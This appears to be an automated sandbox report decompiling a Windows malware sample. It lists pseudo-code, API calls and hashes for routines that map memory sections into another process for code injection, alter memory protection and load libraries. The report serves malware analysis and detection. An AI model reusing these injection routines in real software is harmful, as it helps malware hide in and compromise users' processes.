                                                                                                    				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
                                                                                                    				_t185 = _t203 - 0x60;
                                                                                                    				 *_t185 = _t176;
                                                                                                    				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
                                                                                                    				_t89 =  *_t185;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t203 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t187 = _t203 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
                                                                                                    					 *_t187 = 0x18;
                                                                                                    					_push(_t203 - 0x30);
                                                                                                    					_push(_t187);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t203 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t203 - 8) = _t176;
                                                                                                    						_t96 = _t203 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t188 = _t203 - 0x54;
                                                                                                    						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t203 - 0x50);
                                                                                                    							_t120 = _t203 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t203 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t202 =  *(_t203 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
                                                                                                    									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                                                                    									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t203 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                                                                    						_t189 = _t203 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L64;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t206;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t232);
                                                                                                    				return _t90;
                                                                                                    			}
























                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                    • Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
                                                                                                    • Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                    • Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 255 40159a-4015b2 call 4011f5 259 4015b4 255->259 260 4015b7-4015bc 255->260 259->260 262 4015c2-4015d3 260->262 263 4018d7-4018df 260->263 267 4018d5 262->267 268 4015d9-401602 262->268 263->260 266 4018e4-40192f call 4011f5 263->266 267->266 268->267 275 401608-40161f NtDuplicateObject 268->275 275->267 277 401625-401649 NtCreateSection 275->277 279 4016a5-4016cb NtCreateSection 277->279 280 40164b-40166c NtMapViewOfSection 277->280 279->267 284 4016d1-4016d5 279->284 280->279 282 40166e-40168a NtMapViewOfSection 280->282 282->279 285 40168c-4016a2 282->285 284->267 287 4016db-4016fc NtMapViewOfSection 284->287 285->279 287->267 289 401702-40171e NtMapViewOfSection 287->289 289->267 292 401724 289->292 292->267 293 401724 call 401729 292->293 293->267
                                                                                                    C-Code - Quality: 84%
                                                                                                    			E0040159A() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t127;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t184;
                                                                                                    				intOrPtr* _t186;
                                                                                                    				HANDLE* _t187;
                                                                                                    				HANDLE* _t188;
                                                                                                    				void* _t201;
                                                                                                    				void* _t202;
                                                                                                    				intOrPtr* _t204;
                                                                                                    				void* _t209;
                                                                                                    
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t209);
                                                                                                    				_t127 =  *((intOrPtr*)(_t202 + 8));
                                                                                                    				_t176 = 0;
                                                                                                    				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                                    				_t184 = _t202 - 0x60;
                                                                                                    				 *_t184 = _t176;
                                                                                                    				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
                                                                                                    				_t89 =  *_t184;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t202 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t186 = _t202 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
                                                                                                    					 *_t186 = 0x18;
                                                                                                    					_push(_t202 - 0x30);
                                                                                                    					_push(_t186);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t202 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t202 - 8) = _t176;
                                                                                                    						_t96 = _t202 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t187 = _t202 - 0x54;
                                                                                                    						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t202 - 0x50);
                                                                                                    							_t120 = _t202 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t202 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t201 =  *(_t202 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
                                                                                                    									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                                    									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t202 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                                    						_t188 = _t202 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L61;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t204;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t230);
                                                                                                    				return _t90;
                                                                                                    			}























                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                    • Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
                                                                                                    • Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                    • Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 294 1e674bb-1e674d4 295 1e674d6-1e674d8 294->295 296 1e674df-1e674eb CreateToolhelp32Snapshot 295->296 297 1e674da 295->297 298 1e674ed-1e674f3 296->298 299 1e674fb-1e67508 Module32First 296->299 297->296 298->299 306 1e674f5-1e674f9 298->306 300 1e67511-1e67519 299->300 301 1e6750a-1e6750b call 1e6717a 299->301 304 1e67510 301->304 304->300 306->295 306->299
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 01E674E3
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 01E67503
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, Offset: 01E61000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1e61000_uwjrhss.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: 05b17c4f77cce14c35a56d2a18c3b542185f579155c3dae178cdb70d46dbacd7
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: EDF0F631940311ABE7203BFC9C8CB6F7AECBF492ADF501528E786910C0DB74E8458A61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 307 401749-40174c 309 4018d5-40192f call 4011f5 307->309 310 4016db-4016fc NtMapViewOfSection 307->310 310->309 311 401702-40171e NtMapViewOfSection 310->311 311->309 313 401724 311->313 313->309 315 401724 call 401729 313->315 315->309
                                                                                                    APIs
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SectionView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1323581903-0
                                                                                                    • Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                    • Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
                                                                                                    • Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                    • Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 326 40f520-40f556 call 40c7f0 329 40f558-40f55e 326->329 330 40f560 329->330 331 40f566-40f56c 329->331 330->331 332 40f57e-40f585 331->332 333 40f56e-40f574 331->333 332->329 335 40f587-40f591 332->335 333->332 334 40f576-40f57c 333->334 334->332 334->335 336 40f597-40f62c 335->336 337 40f6bb-40f6fe GlobalAlloc 335->337 373 40f63b-40f63f 336->373 374 40f62e-40f638 336->374 338 40f700-40f703 337->338 340 40f714-40f719 338->340 341 40f705-40f70f 338->341 342 40f855-40f859 340->342 343 40f71f-40f850 340->343 341->340 342->338 344 40f85f-40f863 342->344 343->342 347 40f874-40f879 344->347 348 40f865-40f872 call 40f230 344->348 351 40f915-40f930 call 40f180 call 40f4f0 call 40f330 347->351 352 40f87f-40f90d 347->352 348->347 367 40f935-40f93f 351->367 352->351 370 40f981-40f998 367->370 371 40f941-40f979 367->371 371->370 375 40f641-40f64b 373->375 376 40f64e-40f698 373->376 374->373 375->376 401 40f6b9 376->401 402 40f69a-40f6a2 376->402 401->337 403 40f6b0-40f6b6 402->403 404 40f6a4-40f6ae 402->404 403->401 404->403
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNELBASE(00000000,01B26FA4), ref: 0040F6CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631209093.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_409000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocGlobal
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761449716-0
                                                                                                    • Opcode ID: fc3fe15670ad445a81a0a1c59a104890bd50abbac8f9e8819835a8cdc4caf0ec
                                                                                                    • Instruction ID: 0c1a56b8fe9fcce86bef0367314132a34f7c135904c846998f942d3fcff263de
                                                                                                    • Opcode Fuzzy Hash: fc3fe15670ad445a81a0a1c59a104890bd50abbac8f9e8819835a8cdc4caf0ec
                                                                                                    • Instruction Fuzzy Hash: 78C10C71644340AFE370AFA0DD4AF9A77A4AB44B06F10053EF789BA5E0CBB45444CB6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 423 40f180-40f21c VirtualProtect
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(01B21D6C,01B26FA4,00000040,?,?,0040F921), ref: 0040F218
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631209093.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_409000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 419d65351ee2ee0090a9c9ac0f4a08d0769de6d65bf08936b598afe5cede4f7e
                                                                                                    • Instruction ID: 33c8d40dc3e6cc9a83b9db5c10a78fb5b0d9e280a45d1d5360d6ad10d4a1305f
                                                                                                    • Opcode Fuzzy Hash: 419d65351ee2ee0090a9c9ac0f4a08d0769de6d65bf08936b598afe5cede4f7e
                                                                                                    • Instruction Fuzzy Hash: 1201E8F020A340DED331CF66FE85B517B65A755721F90512DE149873B4D7744886CB2D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 426 40f330-40f361 LoadLibraryA
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(00429938,0040F935), ref: 0040F35B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631209093.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_409000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: e31a23daf31a734ca8eb984a86a88a8ca709d9e9bff161ad91de18902ab3d715
                                                                                                    • Instruction ID: cc85038d26f41e392b25cc775a989e1a0df30f8392305f89cd9ee0120de5ca4d
                                                                                                    • Opcode Fuzzy Hash: e31a23daf31a734ca8eb984a86a88a8ca709d9e9bff161ad91de18902ab3d715
                                                                                                    • Instruction Fuzzy Hash: 91C002E0652200CACB208F51A98AB58BB74BA00731FE0502C95945A731D77009C7CB1E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 467 401932-40197e 475 401981-4019a3 call 4011f5 Sleep call 401467 467->475 476 40196f-40197a 467->476 481 4019b2-4019f7 call 4011f5 475->481 482 4019a5-4019ad call 401558 475->482 476->475 482->481
                                                                                                    C-Code - Quality: 22%
                                                                                                    			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                    				char _v8;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* _t10;
                                                                                                    				void* _t12;
                                                                                                    				intOrPtr* _t14;
                                                                                                    				void* _t19;
                                                                                                    				void* _t20;
                                                                                                    
                                                                                                    				_push(0x1986);
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, __eflags);
                                                                                                    				_t14 = _a4;
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push( &_v8);
                                                                                                    				_push(_a12);
                                                                                                    				_push(_a8);
                                                                                                    				_push(_t14); // executed
                                                                                                    				_t10 = L00401467(_t19, _t20); // executed
                                                                                                    				_t26 = _t10;
                                                                                                    				if(_t10 != 0) {
                                                                                                    					E00401558(_t14, _t10, _v8, _a16); // executed
                                                                                                    				}
                                                                                                    				 *_t14(0xffffffff, 0);
                                                                                                    				_t12 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, _t26);
                                                                                                    				return _t12;
                                                                                                    			}











                                                                                                    0x00401943
                                                                                                    0x0040195b
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                    • Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
                                                                                                    • Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                    • Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 496 40193d-40197e 499 401981-4019a3 call 4011f5 Sleep call 401467 496->499 500 40196f-40197a 496->500 505 4019b2-4019f7 call 4011f5 499->505 506 4019a5-4019ad call 401558 499->506 500->499 506->505
                                                                                                    C-Code - Quality: 29%
                                                                                                    			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                    				void* _t14;
                                                                                                    				void* _t16;
                                                                                                    				intOrPtr* _t18;
                                                                                                    				void* _t30;
                                                                                                    				signed int _t38;
                                                                                                    
                                                                                                    				_t26 = __edi;
                                                                                                    				asm("in eax, 0x45");
                                                                                                    				_t2 = __eax - 0x7a;
                                                                                                    				 *_t2 =  *(__eax - 0x7a) | __ecx;
                                                                                                    				_t38 =  *_t2;
                                                                                                    				_push(0x1986);
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(__edi, _t38);
                                                                                                    				_t18 =  *((intOrPtr*)(_t30 + 8));
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push(_t30 - 4);
                                                                                                    				_push( *((intOrPtr*)(_t30 + 0x10)));
                                                                                                    				_push( *((intOrPtr*)(_t30 + 0xc)));
                                                                                                    				_push(_t18); // executed
                                                                                                    				_t14 = L00401467(__edi, __esi); // executed
                                                                                                    				_t39 = _t14;
                                                                                                    				if(_t14 != 0) {
